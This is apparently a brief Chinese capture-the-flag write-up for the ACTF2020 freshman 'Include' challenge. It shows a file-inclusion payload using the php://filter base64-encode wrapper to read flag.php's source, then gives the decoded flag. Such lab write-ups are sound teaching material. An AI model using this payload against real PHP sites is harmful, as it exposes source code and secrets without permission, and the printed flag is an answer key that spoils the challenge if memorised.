[ACTF2020 新生赛]Include
点击tip,发现url中直接出现了文件包含
![[ACTF2020 新生赛]Include](https://cdn.ancii.com/article/image/v1/sw/wV/kP/PkwwVsGDmjDG9swnOi7SkjVAsMQAarn73E9S3mmSmcBEQ9lpbY3dHIuMBJsKKtPEozVOkod_fI3nfTEfFTcAeg.png "[ACTF2020 新生赛]Include")
考虑php://filter伪协议,使用php://filter伪协议进行文件包含时,要加上read=convert.base64-encode对文件进行编码请求得到base64编码后的文件源码:
构造payload:?file=php://filter/read=convert.base64-encode/resource=flag.php,结果一试就准。
![[ACTF2020 新生赛]Include](https://cdn.ancii.com/article/image/v1/sw/wV/kP/PkwwVsGDmjDG9swnOi7SkjVAsMQAarn73E9S3mmSmcBEQ9lpbY3dHIuMBJsKKtPEv2hAG28e-3R8byYB_aSgEw.png "[ACTF2020 新生赛]Include")
接着base64解码就行。
![[ACTF2020 新生赛]Include](https://cdn.ancii.com/article/image/v1/sw/wV/kP/PkwwVsGDmjDG9swnOi7SkjVAsMQAarn73E9S3mmSmcBEQ9lpbY3dHIuMBJsKKtPEeA41bqFQKxOBGCxfDRAGWg.png "[ACTF2020 新生赛]Include")
flag{c83f4295-69aa-4666-9189-132ebf8891b4}